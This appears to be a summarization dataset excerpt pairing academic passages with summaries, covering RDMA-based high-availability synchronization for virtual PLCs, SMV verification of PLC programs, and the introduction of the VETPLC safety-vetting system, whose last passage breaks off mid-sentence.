978-1-6654-9313-0/23/$31.00 2023 IEEE | DOI: 10.1109/INDIN51400.2023.10218014 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:25 UTC from IEEE Xplore. Restrictions apply. functions can be exchanged with new, scalable, cloud-enabled products. The concept is validated through the modification of a software PLCs to demonstrate the advantages and unlocked optimization potential through consolidation and virtualiza- tion. The paper is structured as follows: Section 2 introduces relevant terminology and technology, and gives an overview over state of the art architectures and requirements of PLCs. Based on current architectures, a concept for highly available stateful applications is presented in Section 3 and validated in Section 4 in a prototypical implementation for state synchro- nization and through a modification of a software PLC in an on-premise environment. In Section 5 the results are discussed. Section6 covers related work on HA, state synchronization and applications with hard RT requirements on distributed systems. Finally, Section 7 concludes this work with a summary and an outlook for future research paths. II. B ACKGROUND This section gives an overview on relevant terminology, technologies and problem statements. A. RDMA Remote Direct Memory Access (RDMA) enables data to be synchronized in the main memory of another host without involving the CPU, caches or the operating system (OS) [4]. This results in a significantly higher throughput with low latency at the same time. There exist two main streams of RDMA deployments. Infiniband (IB) relies on a different hardware stack compared to IEEE 802.3. Infiniband V olume 2 [5] describes the physical layer, whereas layers 2-4 in accordance to the OSI reference model [6] are part of Infiniband V olume 1 [7]. A credit based congestion mechanism ensures lossless transmission [8]. On the other hand, RDMA over Converged Ethernet (RoCE) reuses existing Ethernet standards for the delivery of packets. RoCE v2 introduced routing capabilities by relying on UDP as the underlying transport protocol. For the rest of this work, RoCE denotes RoCE v2 for simplicity. RoCE assumes lossless transmission of frames. A possible solution is the Priority Flow Control defined in IEEE 802.1Qbb [9]. More recent mechanisms of congestion avoidance include DCQCN [10], TIMELY [11] and IRN [9]. Out of order (OOO)-packets are handled by the IB layer 4 transport mechanisms. Any OOO-packets are dropped and cause a retransmission of the respective packets, leading to an inefficient communication [7]. Selected manufacturer provide experimental verbs to compensate for that and write into the host memory, e.g., Mellanox starting from their X-5 series [12]. Finally, soft-RoCE allows the usage of non-RDMA capable Network Interface Cards (NICs) by virtualizing the IB layer 4 functionality [7] that is usually embedded in hardware of the NICs due to performance reasons. Fig. 1 displays the different technologies in comparison to the OSI reference model. IB L1 IEEE 802.3 IEEE 802.3 IEEE 802.3 PhysicalIB L2 IEEE 802.3 IEEE 802.3 IEEE 802.3 Data LinkIB L3 IP IP IP NetworkUDP UDPTCP/UDP TransportInfiniband RoCE v2 Soft-RoCE TCP/UDP RDMA APIAPP APP APP APP Application HW: IB L4 SW: IB L4Fig. 1. Infiniband vs. RoCE v2 vs. soft-RoCE vs. TCP/IP in relation to the OSI layer model B. Programmable Logic Controllers in Automation PLCs are considered the brain of every automation cell. Every device on the shop floor is directly or indirectly in communication with a PLC and malfunctioning PLCs usually lead to a standstill. Devices that are controlled by a PLC are often referred to as input/outputs (I/Os). The following subsections are giving an overview of the evolution of PLCs, requirements in regard to state size and failover times and currently available HA solutions. 1) Hardware-bound Infrastructure of today: The current paradigm up to this day in the automation domain is to deploy hardware appliances for every single function, e.g., for AI inference use cases, rugged workstation PCs are directly con- nected to related peripherals (camera, laser- and other sensors) and AI inference services run directly on these devices on the shop floor. Hence, the complexity is continuously growing and manageability becomes an issue. 2) Virtualization-based Infrastructure of the future: The process automation industry already experienced a shift from hardware to software-based business models for higher level management and control functionalities such as distributed control systems. On the other hand, PLCs remain as hardware on the shop floor with limited compute and storage till today, mostly because of network availability concerns and missing availability of virtualized PLCs and hypervisors that meet RT constraints [13]. 3) Real-Time Requirements of PLCs: Most applications in the automation domain inherit RT requirements. The definition of RT highly depends on the use case or scenario and relate to the usefulness of the systems reaction after not meeting a deadline [14]. Packet loss or delays are tolerable to a certain degree, depending on the underlying process, e.g., due to overfrequent communication of redundant data between PLC and I/Os. There exists however a hard limit and therefore hard RT requirements when it comes to the general connection availability. The usage of a watchdog timer is a common way in Industrial Ethernet standards to ensure a working connection. After a packet arrives, a timer is started on the receiver side. If no other packet arrives till the timer hits a Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:25 UTC from IEEE Xplore. Restrictions apply. predefined number of milliseconds, usually three times the cycle time or more, the connection is deemed to be lost. This has to be avoided at all costs for many applications since that scenario usually results in a complete standstill and often manual intervention by a human to restart the process. Typical cycle times in the automation domain are between 1 ms and 100 ms with their watchdog timer at 3 ms to 300 ms respectively [15]. The focus of this paper is exclusively on RT communication. Of course, the PLC itself needs to be RT capable, e.g., by running an RT OS and on a RT capable hypervisor. This is beyond the scope of this work. 4) State Size Requirements: The memory of PLCs can be divided into two subsets, a static and dynamic one. The static part consists of static variables and the program, that only changes through active engineering and which usually requires recompilation of the code. Secondly, the dynamic subset consists of either I/O data or internal variables and states. A look at available PLCs on the market results in a variety of different sizes, depending on their application domain. Examples from Siemens newest portfolio include maximum static state sizes of 150 KB to 9 MB and dynamic state sizes from 1 MB up to 60 MB, although most models are in the single digit area [16]. Moreover, the 60 MB will not change in every cycle, simply due to limited compute resources and maximum read/write-speed. Some real-life data on expected state sizes is provided by Krause in his analysis of various large plants in 2007, resulting in up to single digit MB [17]. State size requirements of other use cases have not been considered. 5) Redundancy Concepts of PLCs: Redundant controllers are already being deployed today in critical processes, e.g., for the control of vacuum chambers, steam turbines and dehumidifiers [18]. Every major PLC provider uses a similar redundancy concept, such as Siemens, Rockwell Automation and Codesys [18] [20]. A generalized concept is shown in Fig. 2. Reported failover times of the currently available products are around 50 ms, although the corresponding state size is not mentioned [18]. Based on this threshold it is to be expected that the current solution does not meet the HA requirements of all current deployments in the automation domain. PLC PrimaryPLC Backup I/OSynchronization + HeartbeatIndustrial Ethernet Fig. 2. Current redundancy concept of hardware PLCs according to [18] [20] III. C ONCEPT The following section describes our concept for HA of stateful applications with hard RT requirements on cloudinfrastructures. Although it could be applied to any stateful application, the design target was specifically a vPLC. The basis technology for the synchronization of the state is RDMA, which allows for synchronization without involving the CPU or OS by skipping the network stack compared to the usual data transfer over the network. As previously discussed, this reduces latency and limits the overhead on the CPU. The concept assumes that the RDMA functionality is either provided by a physical NIC or virtualized by a technology, e.g., Single Root Input/Output Virtualization (SR- IOV), Freeflow [21] and MasQ [22]. Even though a concept could be developed for an infinite number of worker applications, a more applicable scenario is the usage of a primary and a single backup application in accordance to the current architecture found in Section II-B5. The concept extends existing non-HA applications by two more responsibilities, the role and the state management. A. Role Management The role manager handles the definition of the role of the application, i.e., primary or backup. As a basis for this, it receives the initially intended role of the application during initialization. At startup, the role manager opens a connection as a listener and keeps it open for a predefined time. If the role manager does not receive a signal from a running primary application within the time window, it is assumed that the system is not yet in a running state and the initial value is taken as the current role. The system now enters a running state and the role manager starts to send the current role to its secondary application. If the role manager receives a role during the specified time, it takes over the role based on the given information. B. State Management The state manager handles the synchronization of the pri- mary application to the backup. The synchronization consists of two parts, a sender and a listener. The sender cyclically sends the current state to the listener which applies it to the current application. Moreover, the primary application sends a heartbeat to its backup. If the backup application does not receive a heartbeat within a specified time frame, defined as the timeout time, it assumes that the primary application has failed and takes over its work based on the last received state. The state can consist of several properties of simple and complex data types. Depending on the number of properties and data types, the state can become very large very quickly. Exemplary maximum state sizes for available products on the market are described in Section II-B4. C. State Synchronization The state synchronization is based on RDMA which has many advantageous properties, see Section II-A, compared to classical UDP-based synchronization. Fig. 3 pictures the general idea, which utilizes RDMA to write the dynamic Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:25 UTC from IEEE Xplore. Restrictions apply. contents of the RAM of the primary application in the RAM of the backup application. A shared memory, which is a frequently used technology in the area of synchronization, is not used because current PLCs also rely on RAM synchronization, making it easily extensible through RDMA. Moreover, the concept is designed to synchronize arbitrary state sizes, as well as to enable syn- chronization across containers on different hosts. Here, RDMA offers advantages through the flexible application possibilities and advantageous properties. Compared to other technologies, RDMA enables a significantly better transfer rate and latency by omitting the CPU, caches and OS when transferring data to the main memory of another computer as described in Section II-A. Finally, RT applications are heavily dependant on correct CPU interrupt handling. Offloading functionality into hardware can improve the RT capabilities and is therefore ad- visable. The concept offers two types of state synchronization, full and partial synchronization. Host #1 Primary Application RAM RDMA HeartbeatHost #2 Backup Application RAM Fig. 3. Synchronization between two hosts 1) Full Synchronization: With full synchronization, the complete state is synchronized within a specified interval, regardless of whether the variable has changed since the last transmission. This type of synchronization might be suitable for small states, e.g., a maximum size of 1 MB would utilize 1 Gbit/s with a 8 ms synchronization interval. In principle, big- ger sized states can also be synchronized in this way. However, this will directly effect the transmission latency and bandwidth utilization and thus lead under certain circumstances to the fact that the timeout time or respective the interval between synchronizations has to be increased. Remedy can be at this point the heartbeat introduced in Section III-B, which can be transmitted additionally, temporally independently of the state synchronization and possibly with a higher frequency. 2) Partial Synchronization: In addition to the use of a full synchronization, the concept also offers the possibility of partial synchronization, in which only the parts of the state that have changed since the last state synchronization are transferred. An exemplary scenario with an average rate of change of 10 % within the synchronization interval and a 10 MB state could be synchronized with the necessary performance of a 1 MB state. D. Solution to the Split Brain-Problem The split brain problem is a phenomenon observable on dis- tributed systems with enabled HA features. If the connectionbetween primary and backup application is interrupted, the backup application assumes the termination or malfunction of the primary application and therefore takes over as the new primary application. This might lead to two active primary applications, the split brain. Common techniques to solve this problem include a quorum, witness, and a heartbeat [23], [24]. Since synchronization between three applications results in high hardware utilization, possibly additional license costs and reduced RT capabilities that are not justifiable for every single use case, a quorum might only be a useful alternative for selected use cases. A witness can be deployed that can confirm the malfunctioning of an application. Without it, the connection between primary and backup application might just be disconnected. The deployment however might again add unwanted complexity. Therefore, the concept deploys an additional heartbeat in accordance to current implementations, that offer up to two heartbeats over separate links. A conscious design choice is the transmission of state synchronization and heartbeat over sep- arate network links. This happens for two reasons: First, state synchronization requires a dedicated link to ensure lossless transmission without congestion. As long as the transmission is based on Ethernet, congestion control is an important topic, especially for applications with RT requirements. Infiniband- based deployments are not possible everywhere due to the requirement of a successful brownfield integration. Second, client connection and heartbeat have to be on the same link to overcome the split brain problem without a third entity. In the case of vPLCs, the respective I/Os in the field can function as a witness. After running into an internal timeout, they accept commands from a new controller, confirming that the primary application has been disrupted through sending an acknowledgement to the new primary application. E. Bumpless High Availability The final important property of the concept is bumpless HA in failover scenarios. Here, the RT properties of the respective RT process has to be satisfied, e.g., the I/O RT constraints mentioned in Section II-B3. To allow failover times in the single millisecond area, the detection of a failed primary ap- plication has to happen in less time than the specified timeout. This is achieved through a high-frequent heartbeat, i.e., every millisecond. At the same time, the backup application has to be already in a running state to achieve the desired bumpless behaviour. This is done by simultaneous computations on both, primary and backup, applications, e.g., in the case of the vPLC the respective task is run on both applications and synchronized at the end of the cycle before changing the output values. Finally, the Industrial Ethernet protocol has to support a bumpless handover between two PLC instances, i.e., the PROFINET S2 standard. IV. V ALIDATION The validation is conducted with a minimal configuration and is realized as depicted in Fig. 3 with workstations as a host and RDMA-based state synchronization. Virtualization Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:25 UTC from IEEE Xplore. Restrictions apply. was not considered in this particular test setup to remove any additional uncertainty sources. However, the deployment of the prototype on the hyperscaler Microsoft Azure in VMs of the type HB60rs was successful, which proved to be especially helpful for rapid prototyping of the RDMA-related features. Since timeout, i.e., watchdog timers in Industrial Ethernet protocols, and compute time of a IEC task is highly dependent on the respective application, the validation is solely focused on the synchronization of the state between primary and backup PLC. The state synchronization can be varied to accommodate possibly different scenarios and bandwidths, i.e., full and partial synchronization and arbitrary state sizes. A. Prototype of a stateful application The prototype is developed in the programming language C++ and in accordance to the concept of role and state management defined in Section III. Instead of using the native RDMA libraries, ibVerbs , a wrapper library named Infinity [25], is used that simplifies the integration of RDMA functionalities into the application. Infinity has been created in the context of Barthels work on parallel and distributed join algorithms [26], [27]. B. Software PLC with RDMA and UDP-based synchronization A second validation is conducted through the modification of the redundancy component of a PLC from CODESYS. The component is programmed in the language C and synchro- nizes, amongst other things, a buffer of the primary PLC with the buffer of the secondary PLC. Whereas the current imple- mentation relies on UDP and TCP communication between the two applications, our implementation solely synchronizes the buffer by means of RDMA. C. Synchronization Time Calculation To calculate the synchronization time, a timestamp t1is saved every time when the primary application initiates a state synchronization through RDMA. On the other hand, a timestamp t2is saved on the host of the backup application once the synchronization has been successful. The timestamps of both hosts are compared to receive the synchronization time. This requires synchronous time on both hosts, which is achieved through the usage of the time synchronization Precision Time Protocol (PTP) standardized in IEEE 1588. This results in equation 1 for the synchronization time: tsync=t2 t1 (1) D. Experimental Setup Two different workstations are used as hosts for the ap- plications and are further described in Table I. A Mellanox ConnextX-5 NIC is used due to its support for RDMA and the PTP. The validation is split into two parts: First, the performance of the synchronization with RDMA is evaluated with a mockup PLC. Second, the used concept is applied onto a real software PLC from the company CODESYS and compared against the UDP-based original implementation for the synchronization.TABLE I EXPERIMENTAL SETUP Host #1 Host #2 CPU Intel i9-9900 Intel Xeon W-2175 8x3.1 GHz 14x2.5 GHz RAM DDR4 2133 MHz DDR4 2666 MHz 4x16 GiB 8x16 GiB Storage Samsung SSD 970 EVO SK hynix PC300 SSD 500 GB 1 TB NIC Nvidia Nvidia MCX512A-ACAT MCX512A-ACAT 2x25 Gbit/s 2x25 Gbit/s OS Linux Ubuntu 20.04LTS Linux Ubuntu 20.04LTS E. Results The following experiments are based on the synchronization measurement introduced in Section IV-C. It is split into two parts: First, the mockup PLC is used to validate the benefit of partial synchronization and give an expected range for syn- chronization times of states by means of RDMA. It is notable that only a contiguous memory area is evaluated in the par- tial synchronization scenario. Second, a modified CODESYS software PLC based on state synchronization through RDMA is compared to its original UDP-based synchronization. 1) Partial and Full Synchronization: In accordance to Ta- ble II full synchronization is applied for the state sizes 1 MB and 10 MB and partial synchronization with a change rate of 10% for 10 MB. The table displays the minimum, maximum, average and standard deviation of the synchronization time for the three test scenarios, which were executed 1000 times for 10 s each. Fig. 4. Synchronization cycle times for 1 MB and 10 MB states and varying synchronization modes with RDMA The results of the synchronization time are visualized in Fig. 4 as a Cumulative Distribution Function (CDF). A statistical analysis is provided in Table II. The performance of a partial synchronization is as expected similar to a full synchronization of the transmitted data volume. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:25 UTC from IEEE Xplore. Restrictions apply. TABLE II STATISTICAL ANALYSIS OF SYNCHRONIZATION TIMES FOR PARTIAL AND FULL SYNCHRONIZATION . UNLESS OTHERWISE DISCLOSED ALL VALUES ARE IN MILLISECONDS . State Synchronization Min Max Avg SD 1 MB full 1.70 1.95 1.85 0.05 10 MB partial, 10% change rate 1.68 1.94 1.84 0.40 10 MB full 13.34 14.13 13.62 0.07 2) Software PLC with RDMA and UDP-based synchroniza- tion: Six different test cases are defined, alternating between synchronization methods RDMA and UDP as well as changing state sizes from 100 KB to 1 MB and 10 MB. Table III displays the minimum, maximum, average and standard deviation of the synchronization time for the six test scenarios, which were ex- ecuted 100 times for 10 s each, measured in specific execution points in the vPLC itself with a millisecond precision. The results are visualized in Fig. 5 as a probability distribution. TABLE III STATISTICAL ANALYSIS OF THE STATE SYNCHRONIZATION TIMES OF THE CODESYS PLC BASED ON UDP/TCP AND RDMA. A LL VALUES ARE IN MILLISECONDS . Protocol State Size Min Max Avg SD UDP/TCP 100 KB 25.00 51.00 44.47 8.94 RoCE 100 KB 0.00 2.00 0.20 0.40 UDP/TCP 1 MB 245.00 396.00 295.06 35.00 RoCE 1 MB 1.00 2.00 1.63 0.48 UDP/TCP 10 MB 2467.00 3673.00 2529.36 91.33 RoCE 10 MB 15.00 17.00 15.87 0.37 V. D ISCUSSION The following section discusses the presented results and further steps for improvement and enhancement. A. Meeting Real-Time Requirements of vPLCs Compared to available products of today, where we rep- resentatively measured the performance of a major software PLC, the presented concept consistently achieves synchroniza- tion times in the single digit millisecond area with state sizes of a few MB as displayed in 5. This equals to a reduction of the synchronization time of up to 99.39% on average. Moreover, the absolute standard deviation is significantly lower compared to legacy synchronization methods, which enables multiple use cases to be virtualized while fulfilling their respective HA requirements in accordance to Section II-B3. B. Synchronization Methods Persistence is gated by the speed of replication. The syn- chronization of the state through RDMA is the primary func- tionality that enables HA of stateful applications. Being the key component of the concept, optimizing its mechanisms is highly desirable. A full synchronization of the entire state of the application results in high bandwidth utilization which isoften unnecessary due to synchronization of unchanged vari- ables of the state and therefore redundant data with no value. As expected, cutting the state into smaller pieces with a partial synchronization, here by a factor 10, achieves comparable performance to a full synchronization with a tenth of the actual size. However, the performance of a random non-contiguous memory area might slightly reduce the performance of the partial synchronization and should be a target in a future evaluation. The full synchronization is the current default for available products. Partial synchronization would require adjustments in the code basis of PLC runtimes. The comparison is made to draw attention to the potential and future need in the context of virtualized PLCs for a more sophisticated approach, which could be the sole transmission of variables that have changed since the last update cycle. This way, the smallest amount of bandwidth is needed while still meeting every requirement, a suited frequency of synchronization implied. C. RDMA over DetNet A centralized management of the synchronization of multi- ple applications with their respective backup might be needed to avoid burst scenarios and a high rate of retransmission, especially with the UDP-based RoCE. Purely application- triggered synchronization is not desirable, given the missing holistic view of the synchronizations on the network and hosts. An implementation based on holistic network-based scheduling is therefore desirable. DetNet, that is currently being standardized by the IETF, could be a suited technology to ensure deterministic behavior and congestion prevention for routed environments [28]. Therefore, we propose RDMA over DetNet (RoDN) as the next natural evolution step of RoCE, especially in the context of deterministic communication and services. The main reasons for this proposition include de- terministic upper and lower bound communication with zero congestion and planned resource allocation in a cyclic manner. D. Extension to Kubernetes and Microservices Cloud infrastructures are quickly adopting microservice architectures and in turn apply Kubernetes as a management shell. In context of the vPLC use case, a refactoring of these monolithic applications towards microservice-based architec- ture might improve scalability and availability even further. The final goal could be the dissolvement of the static 1:1 relationship between a PLC and an I/O in the field and instead aim for a 1:n architecture with a Kubernetes managed service. A similar vision is currently being pursuit by standard organizations, i.e., see IEC 61499. E. Concept for the Arrangement of Primary and Backup Applications In order to distribute the computational load in a failover scenario, backup applications of a single host should be evenly distributed to over all other available hosts that meet the necessary requirements such as latency and jitter in-between hosts, compute and storage. Every host runs an arbitrary Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:25 UTC from IEEE Xplore. Restrictions apply. (a) UDP/TCP - 1 MB (b) UDP/TCP - 10 MB (c) RoCE - 1 MB and 10 MB Fig. 5. Synchronization time per cycle of the CODESYS PLC based on UDP and RoCE for two exemplary state sizes 1 MB and 10 MB. number of primary vPLCs and backup vPLCs. In the case of a failover, e.g., malfunctioning of a host, backup vPLCs that were previously provisioned on all other hosts take over. Computational load is evenly distributed and by scaling up the amount of host the computational overhead in case of a malfunction of a single host reduces even further for every single backup host. F . Limited Design Space The design space was consciously limited in this work to demonstrate the excellent fit of RDMA for these par- ticular emerging industrial use cases and motivate the need for further research in that area, i.e., through the suggested partial synchronization method. Subsequent implementations based on technology stacks discussed in the following section are expected to perform worse than the implemented ad-hoc solution modelled after current synchronization methods due to a higher amount of computations or data transfer. However, they can have a positive impact on the efficiency of data storage and consistency in failover scenarios, i.e., through distributed consensus algorithms. VI. R ELATED WORK HA in cloud environments has seen lots of research activi- ties with a variety of possible solutions [29]. The combination of HA and demands on RT capabilities is much rarer though which results in only a handful of publications in that area. There are three major areas where research has taken place around the topics HA and RT simultaneously: Databases, fault tolerance and containers. In addition to the two classic HA approaches for databases, active-active and active-passive, Zamanian et al. developed a new approach, active-memory replication [30]. Here, synchro- nization takes place by means of RDMA. In the field of HA for VMs various protocols such as Remus [31] or the FT Protocol [32] have been developed. In contrast to the HA of databases, this involves the synchronization and fault tolerance of entire Virtual Machines, including CPU, cache, and OS. A similar concept to Freeflow [21] is MasQ, which has been applied on HA for VMs [22]. Both concepts are a possible alternative to the usage of SR-IOV .The last major area deals with the HA of containerized applications or microservices. The approaches here enable, for example, state persistence using stateful set controllers and persisted volumes [33] or via a shared memory in interaction with protocols such as DORADO [34]. Another concept in this area is Shimmy, which is a novel communication interface for microservices based on shared memory and RDMA [35]. The introduction of vPLCs into the automation domain has been suggested before [2], [3]. However, a lift and shift- approach is not sufficient for these type of applications as long as the cloud infrastructure can not meet its requirements. Once consolidated into a centralized cloud infrastructure, the network in-between shop floor and (edge) cloud has to meet RT and HA requirements as well, that were previously only found on the lowest level of the automation pyramid. Nevertheless, the advantages of a cloud deployment of PLCs, e.g, allocation of hardware resources on demand, simplified patch management and an increase of hardware utilization, are considered to be worth the effort and are likely to transform future infrastructures in the automation domain [13]. VII. C ONCLUSION In this work, we successfully implemented a RDMA based high availability solution for stateful applications with hard real-time requirements. The presented concept is scalable through the increase of network bandwidth, partial state trans- fer, scheduling mechanisms, and suitable for VMs and con- tainer environments. We applied the concept onto an available software PLC and allow the synchronization of state sizes with multiple MB while meeting RT requirements through an increase of synchronization speed by up to 200 times. This is the first step for a variety of applications, especially in the factory and process automation such as PLCs, to be realized on a distributed system while also meeting the stringent availability requirements of the automation domain. Future research activities may focus on the usage of Kuber- netes and improvements in state synchronization and schedul- ing. Moreover, distributed consensus mechanisms could be applied on these specific use cases to improve the robustness in failover scenarios. Finally, an implementation of RDMA over Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:25 UTC from IEEE Xplore. Restrictions apply. DetNet might be a suitable alternative to RoCE to guarantee packet delivery and enable deterministic behaviour. ACKNOWLEDGMENT The presented concept was developed within the clus- ter Digital Production of the Research Institute AImotion Bavaria of the Technische Hochschule Ingolstadt. The project is funded by AUDI AG. We thank CODESYS for providing a customizable software PLC and support.
Summary:
Cloud computing is becoming more popular in domains where previously hardware-based bare metal imple- mentations dominated the field of computation workloads such as the automation and process industry. A variety of stateful applications exist that will require high availability on cloud infrastructures while also meeting the hard real-time require- ments in the millisecond area of their superimposed processes, e.g., virtualized programmable logic controllers (vPLCs) and artificial intelligence inference services. This paper presents an approach for stateful applications on distributed systems to meet the application s requirements in failover scenarios through state synchronization by means of Remote Direct Memory Access (RDMA). Experimental results with a software PLC confirm the effectiveness of the described approach in comparison to UDP- based synchronization, reducing the average synchronization time by up to 99.39%. The concept is suitable for applications on virtual machines and containers and might be an enabler for virtualization of real-time critical applications such as control functions in the automation and process industry.
|
Summarize:
1 Introduction The objective of the work reported in this paper is to create an interface between the programming and modeling tools typically used by control engineers and the model checking program SMV, an established tool for formal verification of digital circuits and protocols [l, 21. This provides a means for validating a controller implementation over all possible oper- ating conditions (as represented by the model of the plant) before it is used on the real system. An important feature of the transformation is that the SMV model retains the struc- ture and variable
Summary:
This paper presents an approach to the verification of pro- grams for programmable logic controllers (PLCs) using SMV, a softwqe package for formal verification of state transi- tion systems. Binary PLC programs are converted directly into SMV modules that retain the variable names and exe- cution sequences of the original programs. The system be- ing controlled is modeled by a C/E system block diagram which is also transformed into a set of SMV modules, retain- ing the structure of the block diagram model. SMV allows the engineer to verify the behavior of the control program over all possible operating conditions. Mechanisms are dis- cussed for representing correctly the concurrent execution of the PLC programs and the plant model using SMV primi- tives. The SMV approach to PLC program verification is illustrated with an example.
|
Summarize:
I. I NTRODUCTION Industrial control systems (ICS) play an essential role in modern society. In the new era of Industry 4.0 [12], comput- erized control systems have become the backbone of crucial infrastructures such as power grids, transportation as well as manufacturing sectors. Compared to traditional ICS that were constructed using xed electronic circuits, programmable logic controllers (PLC) have brought exibility, con gurability andautomation to these domains. However, this freedom has also introduced complexity, and thus uncertainty, to safety-critical physical plants. Unexpected logic errors may cause serious problems such as fatal collisions or massive explosions. Re-ports have shown that anomalous ICS behaviors have resultedin loss of life on real-world factory oors [11], [19]. In addition, security problems are highly coupled with safety issues in the ICS domain. In fact, physical damage is one of the major goals for security breaches in ICS. Compared to attacks targeting consumers or IT systems, that often aim to make pro ts or steal data, cyberattacks on factory oors are intended to sabotage physical infrastructures. Real-worldincidents, including Stuxnet [36], German Steel Mill Cyber At- tack [49], Ukrainian Power Grid Attack [50], have shown that although adversaries must rst leverage security penetrationtechniques to in ltrate the digital layers of modern plants, they often attempt to manipulate critical safety parameters, such as the frequency of nuclear centrifuges, and trigger benign butfaulty code, to cause serious damage. Hence, there is a needfor detecting situations where such safety violations can occur. Due to the complexity of contemporary ICS, that involvesinteractions between PLCs and various other machines, we need automated mechanisms to nd such problems. While there exists work [24], [28], [30], [31], [42], [44], [57], [58], [61], [63], [65] that aims to statically verify PLC logic in a formal manner, such static analysis techniquessuffer from signi cant false positives since they are unable to reason about runtime execution contexts. For instance, they may detect potential problematic paths in the code that are infeasible at runtime. In addition, the behavior of ICS is strictly constrained by physical limits at runtime (e.g., velocity, temperature, etc.) as well as changes to these properties. To address these limitations, prior work [35], [39], [45], [62] has explored the usage of dynamic simulations of runtimebehaviors to detect PLC safety violations. In addition, recentwork [43], [54] has enabled symbolic execution on PLCcode. Despite their apparent effectiveness in nding bugs in independent PLC programs, these techniques are limitedbecause they overlook an important fact that a real-worldPLC is never working alone. On the contrary, it collaborateswith other programmable components on the factory oor, such as robots, CNCs or even other PLCs, to carry out certain tasks. Hence, PLC logic is not only triggered byinternal data inputs but also driven by external events dueto the coordination and communication among multiple units.Unfortunately, the aforementioned work focuses mainly on thetesting or resolution of input values and not on the complete event space of multiple collaborating components, and thus cannot automatically exercise real-life PLC programs. To address this problem, we propose V ETPLC, a temporal context-aware, program analysis-based system that automati- *&&&4ZNQPTJVNPO4FDVSJUZBOE1SJWBDZ .V;IBOH6OEFSMJDFOTFUP*&&& %0*41 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. cally constructs timed event sequences . These sequences can then enable automated dynamic safety vetting of PLC code. Although they are still lacking in the PLC context, automated dynamic analysis and symbolic execution onevent-driven programs have been well-studied in the smart- phone [27], [46], [55], [67] and web [51], [66] domains. To model non-deterministic events, researchers have proposed to automatically generate event sequences of different orders, based upon program models [67] or testing [27], [46], [51],[55], [66] to drive program execution. Yet permutation ofevents is insuf cient to describe the conditions that lead tosafety violations in PLC code. The timings, at which events are delivered, matter. This is because PLC events have implicittemporal dependencies caused by both intrinsic durations andexternal physical constraints. Our key observation is that multiple event sequences of the same valid order may or may not lead to safety violations due to the different timings between events. Thus, generating timed event sequences is a requisite step to successfully reveal safety issues in PLC code. Thus, V ETPLC complements the prior research on dynamic analyses and symbolic execution that search merely the valuespace in PLC code. It further introduces novel techniques toexplore the timed event space so as to effectively exercise andexamine PLC programs. Speci cally, (a)to uncover the order of triggering events, we rst perform static program analyses on controller code (ofthe various interconnected units), including PLC and robot and generate timed event causality graphs to represent the temporal dependencies of cross-device events; (b)to quantitatively model the timing of events, we analyze the controller code to extract internal time limits, collect runtime data traces from physical ICS systems and then leverage data mining to recover temporal invariants; (c)combining this timing model with causality graphs, we then create timed event sequences that canserve as inputs for any dynamic PLC code analyses; to enableautomated safety vetting, we formally de ne and manuallycraft safety speci cations based upon expert knowledge andconduct runtime veri cation on PLC execution traces. It is worth noting that previous research has also sought to create timed event sequences for testing event-driven real-time programs. Event sequences have been produced fromeither manually crafted speci cations [48] or pro ling program execution time [52]. In contrast, we automatically extract event ordering and timing using program analyses and data mining, and further enable this technique in the new domain of PLCsand broadly in the context of ICS. To the best of our knowledge, we are the rst to enable timing-aware safety vetting on event-driven time-constrained PLC code for real-world ICS, in particular, via extracting eventtemporalities from program logic and physical environments. We have implemented V ETPLC in 15K lines of code 7K lines of C++ and 8K lines of Java. To demonstrate theef cacy of our approach, we apply it to 10 real-world scenarioson two ICS testbeds that are of completely different physicalcompositions: (i)the SMART [47] testbed is a scaled-down yet fully functional automotive production line and (ii)theFischertechnik testbed replicates a consecutive part processing facility controlled by multiple collaborative PLCs. Note thatthe PLC programs under examination remain intact, and wedid not introduce vulnerable code into them. Experimentalresults show that V ETPLC outperforms the state-of-the-art techniques and can effectively produce event sequences that lead to deep and authentic safety bugs, which are already hidden in real-world PLC code due to developers mistakes. In summary, this paper makes the following contributions: We explore physical ICS testbeds to gain an important insight: real-world controller code is event-driven and timing-sensitive. We are the rst to automate dynamic safety vetting of real-world PLC code via the creation of timed event sequences. We use custom static analyses, that address the speci c programming paradigms of PLCs, to extract causal rela-tionships among events. To the best of our knowledge, this is the rst work thatdistills temporal dependencies in physical ICS testbeds. We have demonstrated the effectiveness of V ETPLC on two different types of real-world ICS testbeds: V ETPLC has found organic vulnerabilities in real-world testbeds. II. B ACKGROUND Programmable Logic Controller. A programmable logic controller [18] is the core control unit of a large number of modern automation systems. It can be either used as a separated master controller or integrated as a slave controller to other machines such as CNCs. The basic functionality ofa PLC is to repeatedly generate control commands based oninput signals and internal control logic. On startup, a PLC is running in an in nite loop where each iteration, called a scan cycle , consists of three major phases. 1) Input: PLC reads inputs from external events (e.g., sensors) and buffers them in memory. 2) Computation: All variable values are xed. The PLC then invokes its logic program and calculates new variable states based on the buffered inputs and their current states. 3) Output: The PLC writes the computed new states into output memory in order to start the next cycle. PLC programming languages follow the international stan- dard IEC 61131-3 [10]. It de nes three graphical languages and two textual languages. All of the languages share IEC 61131-3 common elements and can be translated between each. In particular, the Structured Text (ST) is a high-leveltextual language that syntactically resembles Pascal (Figure 2)and thus is known for its understandability [20]. Notice,however, although an ST program resembles those written in other high-level languages, its data ow is very different dueto the existence of scan cycles . Since PLC variables are kept intact during the computation phase, value changes caused by logic code do not become effective until the next cycle. In effect, in any scan cycle, a PLC variable bears two versions :the current version from the last cycle is effective at thepresent time; the new version records all the changes in thecurrent round and eventually replaces the current one during Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. the output phase. As a result, 1) there exists no data ow within one scan cycle; 2) data ow happens between two neighboringcycles and the current value of a variable may be the result of any assignment instructions in the last cycle. Industrial Robot. An industrial robot is essential for per- forming various actuations, such as assembly, pick-and-place,packaging, etc. Robot programming languages of individualvendors are proprietary but in general fall into two cate-gories: high-level and low-level. High-level languages, such asKAREL for FANUC robots or RAPID for ABB, are in uenced by the Pascal 